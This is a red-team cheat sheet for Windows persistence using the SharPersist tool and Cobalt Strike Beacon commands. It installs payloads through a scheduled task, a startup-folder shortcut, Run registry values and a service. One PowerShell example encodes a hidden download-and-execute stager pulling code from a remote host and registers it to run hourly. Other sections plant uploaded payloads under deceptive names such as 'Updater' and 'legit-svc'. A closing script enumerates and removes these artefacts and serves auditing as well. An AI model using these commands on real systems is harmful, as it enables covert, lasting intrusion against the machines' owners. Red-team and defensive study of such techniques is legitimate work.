SharPersist

https://github.com/mandiant/SharPersist

- Scheduled Tasks

The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, user logon, the computer going idle, the computer being locked, or a combination thereof. A standard user can register a task that runs as themselves, so this technique needs no elevation; an elevated context is only needed to run the task as another principal such as SYSTEM.

SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc {encoded command (Exploitation/Remote Shell/PowerShell)}" -n "Updater" -m add -o hourly

Where:

-t is the desired persistence technique.

-c is the command to execute.

-a are any arguments for that command.

-n is the name of the task.

-m is the mode: add the task (you can also remove, check and list).

-o is the task frequency (hourly in this example).
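The -enc value above is left as a placeholder. The following is an added example, not code from the SharPersist project, showing how the operator builds that argument (powershell.exe -enc takes Base64 of the UTF-16LE bytes, not UTF-8), creates the task, and then confirms it both with SharPersist's own check mode and with the native tooling. It assumes SharPersist.exe is in the current directory; the stager URL is a constructed placeholder.

```powershell
# Added example (not part of SharPersist). Assumes SharPersist.exe is in the
# current directory. The download URL is a constructed placeholder.

# 1. Plaintext one-liner the task should run.
$stager = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/a")'

# 2. -enc expects Base64 of the UTF-16LE ("Unicode") encoding of the script.
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stager))

# 3. Round-trip it before touching the target; a UTF-8 mistake here fails silently later.
if ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enc)) -ne $stager) {
    throw 'encoding round-trip failed'
}

$ps = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"

# 4. Create the task, then ask SharPersist whether it sees it (same arguments, -m check).
.\SharPersist.exe -t schtask -c $ps -a "-nop -w hidden -enc $enc" -n "Updater" -m add -o hourly
.\SharPersist.exe -t schtask -c $ps -a "-nop -w hidden -enc $enc" -n "Updater" -m check -o hourly

# 5. Independent verification: the action, its arguments and the principal the
#    task runs as (the creating user unless the task was registered elevated).
Get-ScheduledTask -TaskName 'Updater' | ForEach-Object {
    $acts = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    "$($_.TaskName) [$($_.State)] as $($_.Principal.UserId): $acts"
}
schtasks /Query /TN Updater /V /FO LIST
```

The schtasks output also shows the trigger that -o hourly produced and the "Last Run Result", which is the quickest way to tell whether the first execution actually returned 0.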

- Startup Folder

Applications, files and shortcuts within a user's startup folder are launched automatically each time that user logs on. It's commonly used to bootstrap the user's environment (set wallpapers, create shortcuts, etc.). The per-user folder is %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup and is writable without elevation.

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc {encoded command}" -f "UserEnvSetup" -m add

Where:

-f is the file name of the shortcut (.lnk) that is dropped into the user's startup folder.

- HKCU / HKLM Registry Autoruns

Run values under HKCU and HKLM launch applications when a user logs on: an HKCU value fires only for that user and can be written without elevation, whereas an HKLM value fires for every user but requires local admin to write. You commonly see these used to start native and 3rd-party applications such as software updaters, download assistants, driver utilities and so on.

Example (the cd, upload, mv and execute-assembly lines are Cobalt Strike Beacon console commands; SharPersist is run in-memory via execute-assembly):

cd C:\ProgramData

upload C:\Payloads\http_x64.exe

mv http_x64.exe Updater.exe

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Where:

-k is the registry key to modify (hkcurun here; SharPersist also supports hklmrun, hkcurunonce and hklmrunonce).

-v is the name of the registry value to create; its data is the command (plus arguments) to execute.

- Windows Services

To create our own service (this requires local admin, and the binary must be a real service executable such as the .svc.exe payload below, otherwise the Service Control Manager times out waiting for it to report its status and fails the start with error 1053):

cd C:\Windows

upload C:\Payloads\tcp-local_x64.svc.exe

mv tcp-local_x64.svc.exe legit-svc.exe

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

Where:

-n is the name of the service to create.
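Every one of the four techniques above leaves an artefact in a well-known location, so an operator should confirm the foothold landed and must remove it at the end of the engagement; the same enumeration is the defender's audit of those locations. The script below is an added example, not part of SharPersist, that lists the scheduled task, the startup-folder shortcut, the Run/RunOnce values in both hives, and the service, using the names from the examples on this page (Updater, UserEnvSetup, legit-svc), and removes them when run with -Cleanup. It assumes it is run as the same user that created the per-user artefacts and, for the service, as a local admin.

```powershell
# Added example, not part of SharPersist: enumerate and optionally remove the
# artefacts created by the schtask, startupfolder, reg and service examples.
# Names match the page's examples; adjust to match what you actually installed.
param([switch]$Cleanup)

$task    = 'Updater'
$lnkName = 'UserEnvSetup'      # startupfolder -f writes "<name>.lnk"
$runVal  = 'Updater'
$svc     = 'legit-svc'

$startup = [Environment]::GetFolderPath('Startup')   # current user's Startup folder
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'

# Scheduled task: what runs and as whom.
Get-ScheduledTask -TaskName $task -ErrorAction SilentlyContinue | ForEach-Object {
    $acts = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    "[schtask] $($_.TaskName) as $($_.Principal.UserId): $acts"
}

# Startup folder: resolve each .lnk to its target instead of trusting the file name.
$shell = New-Object -ComObject WScript.Shell
Get-ChildItem -Path $startup -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
    $s = $shell.CreateShortcut($_.FullName)
    "[startup] $($_.Name) -> $($s.TargetPath) $($s.Arguments)"
}

# Run / RunOnce values in both hives (HKLM is readable without admin).
foreach ($k in $runKeys) {
    $p = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
    if ($p) {
        $p.PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS' } |
            ForEach-Object { "[autorun] $k\$($_.Name) = $($_.Value)" }
    }
}

# Service: binary path, start mode and the account it runs as.
Get-CimInstance Win32_Service -Filter "Name='$svc'" | ForEach-Object {
    "[service] $($_.Name): $($_.PathName) (StartMode=$($_.StartMode), RunsAs=$($_.StartName))"
}

if ($Cleanup) {
    Unregister-ScheduledTask -TaskName $task -Confirm:$false -ErrorAction SilentlyContinue
    Remove-Item -Path (Join-Path $startup "$lnkName.lnk") -ErrorAction SilentlyContinue
    foreach ($k in $runKeys) { Remove-ItemProperty -Path $k -Name $runVal -ErrorAction SilentlyContinue }
    # Deleting the service needs the same local admin right that creating it did.
    if (Get-Service -Name $svc -ErrorAction SilentlyContinue) {
        Stop-Service -Name $svc -Force -ErrorAction SilentlyContinue
        sc.exe delete $svc | Out-Null
    }
    # The dropped binaries (C:\ProgramData\Updater.exe, C:\Windows\legit-svc.exe)
    # stay on disk and are removed separately.
}
```

SharPersist's own -m remove mode (with the same arguments as the add) does the equivalent per technique; the script is useful when the exact command line used to install is no longer to hand, and as a last pass to prove nothing was left behind.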
